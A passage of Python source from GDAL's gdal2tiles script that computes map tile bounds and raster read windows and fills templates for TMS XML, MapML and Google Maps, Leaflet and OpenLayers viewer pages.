ti += 1
ytile = GDAL2Tiles.getYTile(ty, tz, self.options)
tilefilename = os.path.join(
self.output_folder, str(tz), str(tx), "%s.%s" % (ytile, self.tileext))
if self.options.verbose:
print(ti, '/', tcount, tilefilename)
if self.options.resume and os.path.exists(tilefilename):
if self.options.verbose:
print("Tile generation skipped because of --resume")
continue
# Create directories for the tile
if not os.path.exists(os.path.dirname(tilefilename)):
os.makedirs(os.path.dirname(tilefilename))
if self.options.profile == 'mercator':
# Tile bounds in EPSG:3857
b = self.mercator.TileBounds(tx, ty, tz)
elif self.options.profile == 'geodetic':
b = self.geodetic.TileBounds(tx, ty, tz)
elif self.options.profile != 'raster':
b = tmsMap[self.options.profile].TileBounds(tx, ty, tz, self.tile_size)
# Don't scale up by nearest neighbour, better change the querysize
# to the native resolution (and return smaller query tile) for scaling
if self.options.profile != 'raster':
rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1])
# Pixel size in the raster covering query geo extent
nativesize = wb[0] + wb[2]
if self.options.verbose:
print("\tNative Extent (querysize", nativesize, "): ", rb, wb)
# Tile bounds in raster coordinates for ReadRaster query
rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1], querysize=querysize)
rx, ry, rxsize, rysize = rb
wx, wy, wxsize, wysize = wb
else: # 'raster' profile:
tsize = int(self.tsize[tz]) # tile_size in raster coordinates for actual zoom
xsize = self.warped_input_dataset.RasterXSize # size of the raster in pixels
ysize = self.warped_input_dataset.RasterYSize
querysize = self.tile_size
rx = tx * tsize
rxsize = 0
if tx == tmaxx:
rxsize = xsize % tsize
if rxsize == 0:
rxsize = tsize
ry = ty * tsize
rysize = 0
if ty == tmaxy:
rysize = ysize % tsize
if rysize == 0:
rysize = tsize
wx, wy = 0, 0
wxsize = int(rxsize / float(tsize) * self.tile_size)
wysize = int(rysize / float(tsize) * self.tile_size)
if not self.options.xyz:
ry = ysize - (ty * tsize) - rysize
if wysize != self.tile_size:
wy = self.tile_size - wysize
# Read the source raster if anything is going inside the tile as per the computed
# geo_query
tile_details.append(
TileDetail(
tx=tx, ty=ytile, tz=tz, rx=rx, ry=ry, rxsize=rxsize, rysize=rysize, wx=wx,
wy=wy, wxsize=wxsize, wysize=wysize, querysize=querysize,
)
)
conf = TileJobInfo(
src_file=self.tmp_vrt_filename,
nb_data_bands=self.dataBandsCount,
output_file_path=self.output_folder,
tile_extension=self.tileext,
tile_driver=self.tiledriver,
tile_size=self.tile_size,
kml=self.kml,
tminmax=self.tminmax,
tminz=self.tminz,
tmaxz=self.tmaxz,
in_srs_wkt=self.in_srs_wkt,
out_geo_trans=self.out_gt,
ominy=self.ominy,
is_epsg_4326=self.isepsg4326,
options=self.options,
exclude_transparent=self.options.exclude_transparent,
)
return conf, tile_details
def geo_query(self, ds, ulx, uly, lrx, lry, querysize=0):
"""
For given dataset and query in cartographic coordinates returns parameters for ReadRaster()
in raster coordinates and x/y shifts (for border tiles). If the querysize is not given, the
extent is returned in the native resolution of dataset ds.
raises Gdal2TilesError if the dataset does not contain anything inside this geo_query
"""
geotran = ds.GetGeoTransform()
rx = int((ulx - geotran[0]) / geotran[1] + 0.001)
ry = int((uly - geotran[3]) / geotran[5] + 0.001)
rxsize = max(1, int((lrx - ulx) / geotran[1] + 0.5))
rysize = max(1, int((lry - uly) / geotran[5] + 0.5))
if not querysize:
wxsize, wysize = rxsize, rysize
else:
wxsize, wysize = querysize, querysize
# Coordinates should not go out of the bounds of the raster
wx = 0
if rx < 0:
rxshift = abs(rx)
wx = int(wxsize * (float(rxshift) / rxsize))
wxsize = wxsize - wx
rxsize = rxsize - int(rxsize * (float(rxshift) / rxsize))
rx = 0
if rx + rxsize > ds.RasterXSize:
wxsize = int(wxsize * (float(ds.RasterXSize - rx) / rxsize))
rxsize = ds.RasterXSize - rx
wy = 0
if ry < 0:
ryshift = abs(ry)
wy = int(wysize * (float(ryshift) / rysize))
wysize = wysize - wy
rysize = rysize - int(rysize * (float(ryshift) / rysize))
ry = 0
if ry + rysize > ds.RasterYSize:
wysize = int(wysize * (float(ds.RasterYSize - ry) / rysize))
rysize = ds.RasterYSize - ry
return (rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize)
def generate_tilemapresource(self):
"""
Template for tilemapresource.xml. Returns filled string. Expected variables:
title, north, south, east, west, isepsg4326, projection, publishurl,
zoompixels, tile_size, tileformat, profile
"""
args = {}
args['title'] = self.options.title
args['south'], args['west'], args['north'], args['east'] = self.swne
args['tile_size'] = self.tile_size
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['profile'] = self.options.profile
if self.options.profile == 'mercator':
args['srs'] = "EPSG:3857"
elif self.options.profile == 'geodetic':
args['srs'] = "EPSG:4326"
elif self.options.s_srs:
args['srs'] = self.options.s_srs
elif self.out_srs:
args['srs'] = self.out_srs.ExportToWkt()
else:
args['srs'] = ""
s = """<?xml version="1.0" encoding="utf-8"?>
<TileMap version="1.0.0" tilemapservice="http://tms.osgeo.org/1.0.0">
<Title>%(title)s</Title>
<Abstract></Abstract>
<SRS>%(srs)s</SRS>
<BoundingBox minx="%(west).14f" miny="%(south).14f" maxx="%(east).14f" maxy="%(north).14f"/>
<Origin x="%(west).14f" y="%(south).14f"/>
<TileFormat width="%(tile_size)d" height="%(tile_size)d" mime-type="image/%(tileformat)s" extension="%(tileformat)s"/>
<TileSets profile="%(profile)s">
""" % args # noqa
for z in range(self.tminz, self.tmaxz + 1):
if self.options.profile == 'raster':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, (2**(self.nativezoom - z) * self.out_gt[1]), z)
elif self.options.profile == 'mercator':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, 156543.0339 / 2**z, z)
elif self.options.profile == 'geodetic':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, 0.703125 / 2**z, z)
s += """ </TileSets>
</TileMap>
"""
return s
def generate_googlemaps(self):
"""
Template for googlemaps.html implementing Overlay of tiles for 'mercator' profile.
It returns filled string. Expected variables:
title, googlemapskey, north, south, east, west, minzoom, maxzoom, tile_size, tileformat,
publishurl
"""
args = {}
args['title'] = self.options.title
args['googlemapskey'] = self.options.googlekey
args['south'], args['west'], args['north'], args['east'] = self.swne
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['tile_size'] = self.tile_size
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['copyright'] = self.options.copyright
s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<title>%(title)s</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta http-equiv='imagetoolbar' content='no'/>
<style type="text/css"> v\:* {behavior:url(#default#VML);}
html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; }
body { margin: 10px; background: #fff; }
h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; }
#header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; }
#subheader { height: 12px; text-align: right; font-size: 10px; color: #555;}
#map { height: 95%%; border: 1px solid #888; }
</style>
<script src='http://maps.google.com/maps?file=api&v=2&key=%(googlemapskey)s'></script>
<script>
//<![CDATA[
/*
* Constants for given map
* TODO: read it from tilemapresource.xml
*/
var mapBounds = new GLatLngBounds(new GLatLng(%(south)s, %(west)s), new GLatLng(%(north)s, %(east)s));
var mapMinZoom = %(minzoom)s;
var mapMaxZoom = %(maxzoom)s;
var opacity = 0.75;
var map;
var hybridOverlay;
/*
* Create a Custom Opacity GControl
* http://www.maptiler.org/google-maps-overlay-opacity-control/
*/
var CTransparencyLENGTH = 58;
// maximum width that the knob can move (slide width minus knob width)
function CTransparencyControl( overlay ) {
this.overlay = overlay;
this.opacity = overlay.getTileLayer().getOpacity();
}
CTransparencyControl.prototype = new GControl();
// This function positions the slider to match the specified opacity
CTransparencyControl.prototype.setSlider = function(pos) {
var left = Math.round((CTransparencyLENGTH*pos));
this.slide.left = left;
this.knob.style.left = left+"px";
this.knob.style.top = "0px";
}
// This function reads the slider and sets the overlay opacity level
CTransparencyControl.prototype.setOpacity = function() {
// set the global variable
opacity = this.slide.left/CTransparencyLENGTH;
this.map.clearOverlays();
this.map.addOverlay(this.overlay, { zPriority: 0 });
if (this.map.getCurrentMapType() == G_HYBRID_MAP) {
this.map.addOverlay(hybridOverlay);
}
}
// This gets called by the API when addControl(new CTransparencyControl())
CTransparencyControl.prototype.initialize = function(map) {
var that=this;
this.map = map;
// Is this MSIE, if so we need to use AlphaImageLoader
var agent = navigator.userAgent.toLowerCase();
if ((agent.indexOf("msie") > -1) && (agent.indexOf("opera") < 1)){this.ie = true} else {this.ie = false}
// create the background graphic as a <div> containing an image
var container = document.createElement("div");
container.style.width="70px";
container.style.height="21px";
// Handle transparent PNG files in MSIE
if (this.ie) {
var loader = "filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');";
container.innerHTML = '<div style="height:21px; width:70px; ' +loader+ '" ></div>';
} else {
container.innerHTML = '<div style="height:21px; width:70px; background-image: url(http://www.maptiler.org/img/opacity-slider.png)" ></div>';
}
// create the knob as a GDraggableObject
// Handle transparent PNG files in MSIE
if (this.ie) {
var loader = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');";
this.knob = document.createElement("div");
this.knob.style.height="21px";
this.knob.style.width="13px";
this.knob.style.overflow="hidden";
this.knob_img = document.createElement("div");
this.knob_img.style.height="21px";
this.knob_img.style.width="83px";
this.knob_img.style.filter=loader;
this.knob_img.style.position="relative";
this.knob_img.style.left="-70px";
this.knob.appendChild(this.knob_img);
} else {
this.knob = document.createElement("div");
this.knob.style.height="21px";
this.knob.style.width="13px";
this.knob.style.backgroundImage="url(http://www.maptiler.org/img/opacity-slider.png)";
this.knob.style.backgroundPosition="-70px 0px";
}
container.appendChild(this.knob);
this.slide=new GDraggableObject(this.knob, {container:container});
this.slide.setDraggableCursor('pointer');
this.slide.setDraggingCursor('pointer');
this.container = container;
// attach the control to the map
map.getContainer().appendChild(container);
// init slider
this.setSlider(this.opacity);
// Listen for the slider being moved and set the opacity
GEvent.addListener(this.slide, "dragend", function() {that.setOpacity()});
//GEvent.addListener(this.container, "click", function( x, y ) { alert(x, y) });
return container;
}
// Set the default position for the control
CTransparencyControl.prototype.getDefaultPosition = function() {
return new GControlPosition(G_ANCHOR_TOP_RIGHT, new GSize(7, 47));
}
/*
* Full-screen Window Resize
*/
function getWindowHeight() {
if (self.innerHeight) return self.innerHeight;
if (document.documentElement && document.documentElement.clientHeight)
return document.documentElement.clientHeight;
if (document.body) return document.body.clientHeight;
return 0;
}
function getWindowWidth() {
if (self.innerWidth) return self.innerWidth;
if (document.documentElement && document.documentElement.clientWidth)
return document.documentElement.clientWidth;
if (document.body) return document.body.clientWidth;
return 0;
}
function resize() {
var map = document.getElementById("map");
var header = document.getElementById("header");
var subheader = document.getElementById("subheader");
map.style.height = (getWindowHeight()-80) + "px";
map.style.width = (getWindowWidth()-20) + "px";
header.style.width = (getWindowWidth()-20) + "px";
subheader.style.width = (getWindowWidth()-20) + "px";
// map.checkResize();
}
/*
* Main load function:
*/
function load() {
if (GBrowserIsCompatible()) {
// Bug in the Google Maps: Copyright for Overlay is not correctly displayed
var gcr = GMapType.prototype.getCopyrights;
GMapType.prototype.getCopyrights = function(bounds,zoom) {
return ["%(copyright)s"].concat(gcr.call(this,bounds,zoom));
}
map = new GMap2( document.getElementById("map"), { backgroundColor: '#fff' } );
map.addMapType(G_PHYSICAL_MAP);
map.setMapType(G_PHYSICAL_MAP);
map.setCenter( mapBounds.getCenter(), map.getBoundsZoomLevel( mapBounds ));
hybridOverlay = new GTileLayerOverlay( G_HYBRID_MAP.getTileLayers()[1] );
GEvent.addListener(map, "maptypechanged", function() {
if (map.getCurrentMapType() == G_HYBRID_MAP) {
map.addOverlay(hybridOverlay);
} else {
map.removeOverlay(hybridOverlay);
}
} );
var tilelayer = new GTileLayer(GCopyrightCollection(''), mapMinZoom, mapMaxZoom);
var mercator = new GMercatorProjection(mapMaxZoom+1);
tilelayer.getTileUrl = function(tile,zoom) {
if ((zoom < mapMinZoom) || (zoom > mapMaxZoom)) {
return "http://www.maptiler.org/img/none.png";
}
var ymax = 1 << zoom;
var y = ymax - tile.y -1;
var tileBounds = new GLatLngBounds(
mercator.fromPixelToLatLng( new GPoint( (tile.x)*256, (tile.y+1)*256 ) , zoom ),
mercator.fromPixelToLatLng( new GPoint( (tile.x+1)*256, (tile.y)*256 ) , zoom )
);
if (mapBounds.intersects(tileBounds)) {
return zoom+"/"+tile.x+"/"+y+".png";
} else {
return "http://www.maptiler.org/img/none.png";
}
}
// IE 7-: support for PNG alpha channel
// Unfortunately, the opacity for whole overlay is then not changeable, either or...
tilelayer.isPng = function() { return true;};
tilelayer.getOpacity = function() { return opacity; }
overlay = new GTileLayerOverlay( tilelayer );
map.addOverlay(overlay);
map.addControl(new GLargeMapControl());
map.addControl(new GHierarchicalMapTypeControl());
map.addControl(new CTransparencyControl( overlay ));
""" % args # noqa
if self.kml:
s += """
map.addMapType(G_SATELLITE_3D_MAP);
map.getEarthInstance(getEarthInstanceCB);
"""
s += """
map.enableContinuousZoom();
map.enableScrollWheelZoom();
map.setMapType(G_HYBRID_MAP);
}
resize();
}
"""
if self.kml:
s += """
function getEarthInstanceCB(object) {
var ge = object;
if (ge) {
var url = document.location.toString();
url = url.substr(0,url.lastIndexOf('/'))+'/doc.kml';
var link = ge.createLink("");
if ("%(publishurl)s") { link.setHref("%(publishurl)s/doc.kml") }
else { link.setHref(url) };
var networkLink = ge.createNetworkLink("");
networkLink.setName("TMS Map Overlay");
networkLink.setFlyToView(true);
networkLink.setLink(link);
ge.getFeatures().appendChild(networkLink);
} else {
// alert("You should open a KML in Google Earth");
// add div with the link to generated KML... - maybe JavaScript redirect to the URL of KML?
}
}
""" % args # noqa
s += """
onresize=function(){ resize(); };
//]]>
</script>
</head>
<body onload="load()">
<div id="header"><h1>%(title)s</h1></div>
<div id="subheader">Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>
<!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU -->
</div>
<div id="map"></div>
</body>
</html>
""" % args # noqa
return s
def generate_leaflet(self):
"""
Template for leaflet.html implementing overlay of tiles for 'mercator' profile.
It returns filled string. Expected variables:
title, north, south, east, west, minzoom, maxzoom, tile_size, tileformat, publishurl
"""
args = {}
args['title'] = self.options.title.replace('"', '\\"')
args['htmltitle'] = self.options.title
args['south'], args['west'], args['north'], args['east'] = self.swne
args['centerlon'] = (args['north'] + args['south']) / 2.
args['centerlat'] = (args['west'] + args['east']) / 2.
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['beginzoom'] = self.tmaxz
args['tile_size'] = self.tile_size # not used
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url # not used
args['copyright'] = self.options.copyright.replace('"', '\\"')
s = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name='viewport' content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no' />
<title>%(htmltitle)s</title>
<!-- Leaflet -->
<link rel="stylesheet" href="https://unpkg.com/[email protected]/dist/leaflet.css" />
<script src="https://unpkg.com/[email protected]/dist/leaflet.js"></script>
<style>
body { margin:0; padding:0; }
body, table, tr, td, th, div, h1, h2, input { font-family: "Calibri", "Trebuchet MS", "Ubuntu", Serif; font-size: 11pt; }
#map { position:absolute; top:0; bottom:0; width:100%%; } /* full size */
.ctl {
padding: 2px 10px 2px 10px;
background: white;
background: rgba(255,255,255,0.9);
box-shadow: 0 0 15px rgba(0,0,0,0.2);
border-radius: 5px;
text-align: right;
}
.title {
font-size: 18pt;
font-weight: bold;
}
.src {
font-size: 10pt;
}
</style>
</head>
<body>
<div id="map"></div>
<script>
/* **** Leaflet **** */
// Base layers
// .. OpenStreetMap
var osm = L.tileLayer('http://{s}.tile.osm.org/{z}/{x}/{y}.png', {attribution: '© <a href="http://osm.org/copyright">OpenStreetMap</a> contributors', minZoom: %(minzoom)s, maxZoom: %(maxzoom)s});
// .. CartoDB Positron
var cartodb = L.tileLayer('http://{s}.basemaps.cartocdn.com/light_all/{z}/{x}/{y}.png', {attribution: '© <a href="http://www.openstreetmap.org/copyright">OpenStreetMap</a> contributors, © <a href="http://cartodb.com/attributions">CartoDB</a>', minZoom: %(minzoom)s, maxZoom: %(maxzoom)s});
// .. OSM Toner
var toner = L.tileLayer('http://{s}.tile.stamen.com/toner/{z}/{x}/{y}.png', {attribution: 'Map tiles by <a href="http://stamen.com">Stamen Design</a>, under <a href="http://creativecommons.org/licenses/by/3.0">CC BY 3.0</a>. Data by <a href="http://openstreetmap.org">OpenStreetMap</a>, under <a href="http://www.openstreetmap.org/copyright">ODbL</a>.', minZoom: %(minzoom)s, maxZoom: %(maxzoom)s});
// .. White background
var white = L.tileLayer("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAQAAAAEAAQMAAABmvDolAAAAA1BMVEX///+nxBvIAAAAH0lEQVQYGe3BAQ0AAADCIPunfg43YAAAAAAAAAAA5wIhAAAB9aK9BAAAAABJRU5ErkJggg==", {minZoom: %(minzoom)s, maxZoom: %(maxzoom)s});
// Overlay layers (TMS)
var lyr = L.tileLayer('./{z}/{x}/{y}.%(tileformat)s', {tms: true, opacity: 0.7, attribution: "%(copyright)s", minZoom: %(minzoom)s, maxZoom: %(maxzoom)s});
// Map
var map = L.map('map', {
center: [%(centerlon)s, %(centerlat)s],
zoom: %(beginzoom)s,
minZoom: %(minzoom)s,
maxZoom: %(maxzoom)s,
layers: [osm]
});
var basemaps = {"OpenStreetMap": osm, "CartoDB Positron": cartodb, "Stamen Toner": toner, "Without background": white}
var overlaymaps = {"Layer": lyr}
// Title
var title = L.control();
title.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'ctl title');
this.update();
return this._div;
};
title.update = function(props) {
this._div.innerHTML = "%(title)s";
};
title.addTo(map);
// Note
var src = 'Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>';
var title = L.control({position: 'bottomleft'});
title.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'ctl src');
this.update();
return this._div;
};
title.update = function(props) {
this._div.innerHTML = src;
};
title.addTo(map);
// Add base layers
L.control.layers(basemaps, overlaymaps, {collapsed: false}).addTo(map);
// Fit to overlay bounds (SW and NE points with (lat, lon))
map.fitBounds([[%(south)s, %(east)s], [%(north)s, %(west)s]]);
</script>
</body>
</html>
""" % args # noqa
return s
def generate_openlayers(self):
"""
Template for openlayers.html, with the tiles as overlays, and base layers.
It returns filled string.
"""
args = {}
args['title'] = self.options.title
args['bingkey'] = self.options.bingkey
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['tile_size'] = self.tile_size
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['copyright'] = self.options.copyright
if self.options.xyz:
args['sign_y'] = ''
else:
args['sign_y'] = '-'
args['ominx'] = self.ominx
args['ominy'] = self.ominy
args['omaxx'] = self.omaxx
args['omaxy'] = self.omaxy
args['center_x'] = (self.ominx + self.omaxx) / 2
args['center_y'] = (self.ominy + self.omaxy) / 2
s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>%(title)s</title>
<meta http-equiv='imagetoolbar' content='no'/>
<style type="text/css"> v\:* {behavior:url(#default#VML);}
html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; }
body { margin: 10px; background: #fff; }
h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; }
#header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; }
#subheader { height: 12px; text-align: right; font-size: 10px; color: #555;}
#map { height: 90%%; border: 1px solid #888; }
</style>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/openlayers/openlayers.github.io@master/en/v6.3.1/css/ol.css" type="text/css">
<script src="https://cdn.jsdelivr.net/gh/openlayers/openlayers.github.io@master/en/v6.3.1/build/ol.js"></script>
<script src="https://unpkg.com/[email protected]"></script>
<link rel="stylesheet" href="https://unpkg.com/[email protected]/src/ol-layerswitcher.css" />
</head>
<body>
<div id="header"><h1>%(title)s</h1></div>
<div id="subheader">Generated by <a href="https://gdal.org/programs/gdal2tiles.html">GDAL2Tiles</a> </div>
<div id="map" class="map"></div>
<div id="mouse-position"></div>
<script type="text/javascript">
var mousePositionControl = new ol.control.MousePosition({
className: 'custom-mouse-position',
target: document.getElementById('mouse-position'),
undefinedHTML: ' '
});
var map = new ol.Map({
controls: ol.control.defaults().extend([mousePositionControl]),
target: 'map',
""" % args
if self.options.profile == 'mercator' or self.options.profile == 'geodetic':
s += """
layers: [
new ol.layer.Group({
title: 'Base maps',
layers: [
new ol.layer.Tile({
title: 'OpenStreetMap',
type: 'base',
visible: true,
source: new ol.source.OSM()
}),
new ol.layer.Tile({
title: 'Bing Roads',
type: 'base',
visible: false,
source: new ol.source.BingMaps({
key: "%(bingkey)s",
imagerySet: 'Road'
})
}),
new ol.layer.Tile({
title: 'Bing Aerial',
type: 'base',
visible: false,
source: new ol.source.BingMaps({
key: "%(bingkey)s",
imagerySet: 'Aerial'
})
}),
new ol.layer.Tile({
title: 'Bing Hybrid',
type: 'base',
visible: false,
source: new ol.source.BingMaps({
key: "%(bingkey)s",
imagerySet: 'AerialWithLabels'
})
}),
]
}),""" % args # noqa
if self.options.profile == 'mercator':
s += """
new ol.layer.Group({
title: 'Overlay',
layers: [
new ol.layer.Tile({
title: 'Overlay',
// opacity: 0.7,
extent: [%(ominx)f, %(ominy)f,%(omaxx)f, %(omaxy)f],
source: new ol.source.XYZ({
attributions: '%(copyright)s',
minZoom: %(minzoom)d,
maxZoom: %(maxzoom)d,
url: './{z}/{x}/{%(sign_y)sy}.%(tileformat)s',
tileSize: [%(tile_size)d, %(tile_size)d]
})
}),
]
}),""" % args # noqa
elif self.options.profile == 'geodetic':
if self.options.tmscompatible:
base_res = 180. / self.tile_size
else:
base_res = 360. / self.tile_size
resolutions = [ base_res / 2**i for i in range(self.tmaxz+1) ]
args['resolutions'] = '[' + ','.join('%.18g' % res for res in resolutions) + ']'
if self.options.xyz:
args['origin'] = '[-180,90]'
args['y_formula'] = 'tileCoord[2]'
else:
args['origin'] = '[-180,-90]'
args['y_formula'] = '- 1 - tileCoord[2]'
s += """
new ol.layer.Group({
title: 'Overlay',
layers: [
new ol.layer.Tile({
title: 'Overlay',
// opacity: 0.7,
extent: [%(ominx)f, %(ominy)f,%(omaxx)f, %(omaxy)f],
source: new ol.source.TileImage({
attributions: '%(copyright)s',
projection: 'EPSG:4326',
minZoom: %(minzoom)d,
maxZoom: %(maxzoom)d,
tileGrid: new ol.tilegrid.TileGrid({
extent: [-180,-90,180,90],
origin: %(origin)s,
resolutions: %(resolutions)s,
tileSize: [%(tile_size)d, %(tile_size)d]
}),
tileUrlFunction: function(tileCoord) {
return ('./{z}/{x}/{y}.%(tileformat)s'
.replace('{z}', String(tileCoord[0]))
.replace('{x}', String(tileCoord[1]))
.replace('{y}', String(%(y_formula)s)));
},
})
}),
]
}),""" % args # noqa
elif self.options.profile == 'raster':
base_res = 2**(self.nativezoom) * self.out_gt[1]
resolutions = [ base_res / 2**i for i in range(self.tmaxz+1) ]
args['maxres'] = resolutions[self.tminz]
args['resolutions'] = '[' + ','.join('%.18g' % res for res in resolutions) + ']'
args['tilegrid_extent'] = '[%.18g,%.18g,%.18g,%.18g]' % (self.ominx, self.ominy, self.omaxx, self.omaxy)
if self.options.xyz:
args['origin'] = '[%.18g,%.18g]' % (self.ominx, self.omaxy)
args['y_formula'] = 'tileCoord[2]'
else:
args['origin'] = '[%.18g,%.18g]' % (self.ominx, self.ominy)
args['y_formula'] = '- 1 - tileCoord[2]'
s += """
layers: [
new ol.layer.Group({
title: 'Overlay',
layers: [
new ol.layer.Tile({
title: 'Overlay',
// opacity: 0.7,
source: new ol.source.TileImage({
attributions: '%(copyright)s',
tileGrid: new ol.tilegrid.TileGrid({
extent: %(tilegrid_extent)s,
origin: %(origin)s,
resolutions: %(resolutions)s,
tileSize: [%(tile_size)d, %(tile_size)d]
}),
tileUrlFunction: function(tileCoord) {
return ('./{z}/{x}/{y}.%(tileformat)s'
.replace('{z}', String(tileCoord[0]))
.replace('{x}', String(tileCoord[1]))
.replace('{y}', String(%(y_formula)s)));
},
})
}),
]
}),""" % args # noqa
else:
tms = tmsMap[self.options.profile]
base_res = tms.resolution
resolutions = [ base_res / 2**i for i in range(self.tmaxz+1) ]
args['maxres'] = resolutions[self.tminz]
args['resolutions'] = '[' + ','.join('%.18g' % res for res in resolutions) + ']'
args['matrixsizes'] = '[' + ','.join('[%d,%d]' % (tms.matrix_width << i, tms.matrix_height << i) for i in range(len(resolutions))) + ']'
if self.options.xyz:
args['origin'] = '[%.18g,%.18g]' % (tms.topleft_x, tms.topleft_y)
args['y_formula'] = 'tileCoord[2]'
else:
args['origin'] = '[%.18g,%.18g]' % (tms.topleft_x, tms.topleft_y - tms.resolution * tms.tile_size)
args['y_formula'] = '- 1 - tileCoord[2]'
args['tilegrid_extent'] = '[%.18g,%.18g,%.18g,%.18g]' % ( \
tms.topleft_x,
tms.topleft_y - tms.matrix_height * tms.resolution * tms.tile_size,
tms.topleft_x + tms.matrix_width * tms.resolution * tms.tile_size,
tms.topleft_y)
s += """
layers: [
new ol.layer.Group({
title: 'Overlay',
layers: [
new ol.layer.Tile({
title: 'Overlay',
// opacity: 0.7,
extent: [%(ominx)f, %(ominy)f,%(omaxx)f, %(omaxy)f],
source: new ol.source.TileImage({
attributions: '%(copyright)s',
minZoom: %(minzoom)d,
maxZoom: %(maxzoom)d,
tileGrid: new ol.tilegrid.TileGrid({
extent: %(tilegrid_extent)s,
origin: %(origin)s,
resolutions: %(resolutions)s,
sizes: %(matrixsizes)s,
tileSize: [%(tile_size)d, %(tile_size)d]
}),
tileUrlFunction: function(tileCoord) {
return ('./{z}/{x}/{y}.%(tileformat)s'
.replace('{z}', String(tileCoord[0]))
.replace('{x}', String(tileCoord[1]))
.replace('{y}', String(%(y_formula)s)));
},
})
}),
]
}),""" % args # noqa
s += """
],
view: new ol.View({
center: [%(center_x)f, %(center_y)f],""" % args # noqa
if self.options.profile in ('mercator', 'geodetic'):
args['view_zoom'] = args['minzoom']
if self.options.profile == 'geodetic' and self.options.tmscompatible:
args['view_zoom'] += 1
s += """
zoom: %(view_zoom)d,""" % args # noqa
else:
s += """
resolution: %(maxres)f,""" % args # noqa
if self.options.profile == 'geodetic':
s += """
projection: 'EPSG:4326',"""
elif self.options.profile != 'mercator':
if self.in_srs and self.in_srs.IsProjected() and self.in_srs.GetAuthorityName(None) == 'EPSG':
s += """
projection: new ol.proj.Projection({code: 'EPSG:%s', units:'m'}),""" % self.in_srs.GetAuthorityCode(None)
s += """
})
});"""
if self.options.profile in ('mercator', 'geodetic'):
s += """
map.addControl(new ol.control.LayerSwitcher());"""
s += """
</script>
</body>
</html>"""
return s
def generate_mapml(self):
if self.options.mapml_template:
template = self.options.mapml_template
else:
template = gdal.FindFile('gdal', 'template_tiles.mapml')
s = open(template, 'rb').read().decode('utf-8')
if self.options.profile == 'mercator':
tiling_scheme = 'OSMTILE'
elif self.options.profile == 'geodetic':
tiling_scheme = 'WGS84'
else:
tiling_scheme = self.options.profile
s = s.replace('${TILING_SCHEME}', tiling_scheme)
s = s.replace('${URL}', self.options.url if self.options.url else "./")
tminx, tminy, tmaxx, tmaxy = self.tminmax[self.tmaxz]
s = s.replace('${MINTILEX}', str(tminx))
s = s.replace('${MINTILEY}', str(GDAL2Tiles.getYTile(tmaxy, self.tmaxz, self.options)))
s = s.replace('${MAXTILEX}', str(tmaxx))
s = s.replace('${MAXTILEY}', str(GDAL2Tiles.getYTile(tminy, self.tmaxz, self.options)))
s = s.replace('${CURZOOM}', str(self.tmaxz))
s = s.replace('${MINZOOM}', str(self.tminz))
s = s.replace('${MAXZOOM}', str(self.tmaxz))
s = s.replace('${TILEEXT}', str(self.tileext))
return s
@staticmethod
def getYTile(ty, tz, options):
"""
Calculates the y-tile number based on whether XYZ or TMS (default) system is used
:param ty: The y-tile number
:param tz: The z-tile number
:return: The transformed y-tile number
"""
if options.xyz and options.profile != 'raster':
if options.profile in ('mercator', 'geodetic'):
return (2**tz - 1) - ty # Convert from TMS to XYZ numbering system
tms = tmsMap[options.profile]
return (tms.matrix_height * 2**tz - 1) - ty # Convert from TMS to XYZ numbering system
return ty
def worker_tile_details(input_file, output_folder, options):
